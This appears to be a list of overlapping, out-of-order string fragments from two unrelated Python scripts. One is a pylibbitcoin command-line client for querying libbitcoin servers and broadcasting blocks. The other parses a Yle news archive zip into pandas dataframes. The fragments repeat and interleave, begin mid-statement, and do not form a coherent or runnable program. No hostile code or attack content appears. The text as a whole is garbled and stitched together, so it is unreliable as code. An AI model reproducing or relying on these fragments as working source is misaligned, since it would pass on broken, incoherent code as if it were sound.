"str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client",
"unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) <",
"return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height = 10_000 return await",
"not in commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client",
"loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if",
"def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index",
"= int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return await",
"loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses =",
"import sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2]",
"client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2]",
"do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address",
"command = sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\" %",
"return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash =",
"print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop())",
"sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height",
"\"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2:",
"bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height = 10_000 return",
"index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return",
"= sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex",
"= sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client):",
"\"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\":",
"= loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__ == '__main__':",
"subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if",
"spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client):",
"# Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might",
"command not in commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) #",
"2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command not in",
"def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw",
"block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash",
"def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command =",
"client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091,",
"% str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\")",
"return await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height,",
"client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def",
"int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash,",
"9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result))",
"= loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses",
"len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command",
"# noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address =",
"\"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" %",
"history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands =",
"import asyncio import sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index",
"== asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close()",
"sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5))",
"block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but this",
"\"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\":",
"= sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client):",
"unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block",
"= pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094})",
"odd but this is a sanity check a client should probably do. #",
"def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client):",
"# This might seem odd but this is a sanity check a client",
"def history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands",
"= sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client):",
"= pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\":",
"if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost:",
"start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\":",
"return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash =",
"should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def",
"def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return",
"def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True:",
"_read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def",
"can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) #",
"{}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of",
"loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__ == '__main__': main()",
"broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage:",
"{\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result",
"iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\",",
"is a sanity check a client should probably do. # noqa: E501 block",
"\"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, }",
"\"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\":",
"\", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client =",
"block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height =",
"client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction,",
"import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index))",
"address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get())",
"error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue:",
"import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client):",
"noqa: E501 # This might seem odd but this is a sanity check",
"client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop =",
"sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\" % str.join(\", \",",
"a sanity check a client should probably do. # noqa: E501 block =",
"sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return",
"commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\",",
"while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client):",
"settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\":",
"import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height()",
"probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client):",
"= sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\" % str.join(\",",
"return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash)",
"asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) ==",
"result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result))",
"asyncio import sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index =",
"def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address)",
"block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast,",
"check a client should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return",
"return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash =",
"= { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\":",
"True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): #",
"block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash)",
"await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\":",
"a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd",
"commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index,",
"number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__ ==",
"\"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\":",
"client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def",
"= sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands = { \"last_height\":",
"\"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client))",
"hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address",
"sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands = { \"last_height\": last_height,",
"{}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses",
"\"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code:",
"be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client",
"https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but this is a",
"block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index =",
"pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code,",
"type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses))",
"seem odd but this is a sanity check a client should probably do."
] |
[
"argparse import sys import json import re import os from markdown import markdown",
"but if there's no hurry then the text will be cleaner text =",
"text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] ==",
"\"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but",
"= clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text }",
"data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published':",
"# Parsed data dictionary parsed_data = { **metadata, 'text': text } df =",
"e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if",
"import re import os from markdown import markdown from bs4 import BeautifulSoup import",
"df files except Exception as e: print(\"Error creating output path!\") print(e) # Saving",
"\", fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter,",
"'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname)",
"help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args =",
"pkl extension for df files except Exception as e: print(\"Error creating output path!\")",
"import os from markdown import markdown from bs4 import BeautifulSoup import ftfy import",
"% 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ ==",
"= \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down,",
"+= 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json",
"<reponame>kamalmemon/yle-news-reader<filename>yle_reader_to_dataframe.py import zipfile import argparse import sys import json import re import os",
"<NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja",
"fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published',",
"pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False)",
"text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows",
"in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text",
"pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished",
"fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id':",
"columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping",
"reading file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata =",
"\"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"]",
"clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text } df",
"= df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath),",
"creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter %",
"Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle",
"zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname in",
"cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data =",
"sys import json import re import os from markdown import markdown from bs4",
"y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive",
"slows down, but if there's no hurry then the text will be cleaner",
"if there's no hurry then the text will be cleaner text = fix_encoding(text)",
"ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html",
"# [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text =",
"data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f:",
"json import re import os from markdown import markdown from bs4 import BeautifulSoup",
"file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata = {",
"parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader -",
"0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser =",
"= markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile)",
"os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception",
"news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile",
"data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output",
"uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html =",
"in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"],",
"with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file,",
"\"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and",
"df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if",
"if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\",",
"from bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): #",
"paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"])",
"dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter,",
"} # Article content for paragraph in article[\"content\"]: # skip images etc. if",
"= \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\"",
"= pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not",
"fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data =",
"ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath",
"fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except",
"not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id':",
"import argparse import sys import json import re import os from markdown import",
"bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT:",
"down, but if there's no hurry then the text will be cleaner text",
"in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}]",
"= zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job",
"# kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text",
"# pkl extension for df files except Exception as e: print(\"Error creating output",
"downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args = argparser.parse_args()",
"json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: # Metadata",
"os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files",
"return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames)",
"file \", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except",
"import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text,",
"import sys import json import re import os from markdown import markdown from",
"as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def",
"in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text'])",
"as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \",",
"print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if",
"features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files =",
"len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames: counter +=",
"article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip",
"files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news",
"archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\",",
"as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files))",
"metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } #",
"== 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser",
"parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir',",
"== \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue",
"JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return",
"re import os from markdown import markdown from bs4 import BeautifulSoup import ftfy",
"json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as",
"except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: #",
"argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile',",
"markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames",
"counter = 0 print(\"Parsing job started..\") for fname in fnames: counter += 1",
"# skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\"",
"continue text = paragraph[\"text\"].strip() # slows down, but if there's no hurry then",
"= len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames: counter",
"1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data",
"= os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df",
"print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter",
"counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading",
"for df files except Exception as e: print(\"Error creating output path!\") print(e) #",
"not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data",
"from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args = argparser.parse_args() main(args)",
"clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text",
"if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try:",
"'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip images",
"'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: #",
"toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_",
